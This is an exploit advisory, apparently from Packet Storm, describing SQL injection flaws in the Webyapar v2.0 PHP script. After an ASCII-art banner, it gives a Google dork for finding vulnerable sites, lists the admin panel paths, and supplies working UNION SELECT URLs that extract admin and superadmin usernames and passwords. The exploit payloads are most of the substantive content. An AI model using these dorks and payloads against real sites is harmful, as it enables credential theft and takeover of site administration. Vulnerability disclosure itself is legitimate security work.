Webyapar version 2.0 suffers from multiple SQL injection vulnerabilities.
3ee3e4499cc66037cc1f076b120a23d6da2764f3b7226d1f629898c8d98d9814#########################################################################################################################
#########################################################################################################################
############/$$$$$$$$$$$////$$$$$$$$$$$//###################///////////###############//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$/
###///////##/$$$$$$$$//////////$$$$$$$$//####################/////////#####//////$$$$$//$$$$/////////////$$$$////////////
##///////###/$$$$$$$////////////$$$$$$$//#####///////////#####///////#####///////$$$$$//$$$$/////////////$$$$////////////
##//////###///$$$$$$$//////////$$$$$$$///#####///////////#####//////#####////////$$$$$//$$$$/////////////$$$$////////////
##/////###/////$$$$$$$////////$$$$$$$////#####//////////######/////#####/////////$$$$$//$$$$/////////////$$$$////////////
##////###///////$$$$$$$//////$$$$$$$/////######////////#######////#####//////////$$$$$//$$$$/////////////$$$$////////////
##///###/////////$$$$$$$////$$$$$$$//////#######//////#######////#####///////////$$$$$//$$$$/////////////$$$$////////////
###################$$$$$$##$$$$$$################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
####################$$$$$$$$$$$$#################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
##///###////////////$$$$$$$$$$$$/////////#########////////////#####//////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
##////###////////////$$$$$$$$$$//////////########////////////#####///////////////$$$$$/////////////$$$$//////////////$$$$
##/////###////////////$$$$$$$$///////////#######////////////#####////////////////$$$$$/////////////$$$$//////////////$$$$
##//////###////////////$$$$$$////////////#######///////////#####/////////////////$$$$$/////////////$$$$//////////////$$$$
###//////##/////////////$$$$/////////////#######//////////#####//////////////////$$$$$/////////////$$$$//////////////$$$$
############/////////////$$//////////////#######/////////#####///////////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
#########################################################################################################################
#########################################################################################################################
##### TURKISH SECURİTY MAN AND C0D3R ####################### MAİL : dumanhack@gmail.com ###########################
##### - ##### web : ##########
##### PERFECT C0D3R AND SECURİTY ## >>>>>>>>>>>>>> MESSAGE : HAYAT İLLEGAL <<<<<<<<<<<<<<< ##
#########################################################################################################################
# Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability
# AUTHOR: : bypass
# script name : Webyapar v2.0 { 700$ }
# Language : Tr
# scritp web page : www.webyapar.com
# script bug : remote sql enjeksiyon
# script admin panel1 : https://victim/script_path/yonetim
# script admin panel2 : https://victim/script_path/yonetim2
# google dork : inurl:"?page=duyurular_detay&id="
#Message Tr : ingilizcem pek iyi degildir. kodun piyasada satıs degeri 700$ - kodun sql dısında xss acıklarıda bulunmaktadır
ama pek fazla xss acıkları işinize yaramayacaktır. yonetim panelleri standart verilmistir...
# Message Tr : Hayat İllegal - / -
< / -------------------------------------------------------------------------------------------------------- />
< / ------ Example sql bug 1 admin username : ------ / >
https://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin
< / ------ Example sql bug 1 admin password : ------ / >
https://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
< / ------ Example sql bug 2 superadmin password and admin username : ------ / >
https://VİCTİM/SCRİPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin
< / -------------------------------------------------------------------------------------------------------- />
Sql enjeksiyon bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
Sql enjeksiyon bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed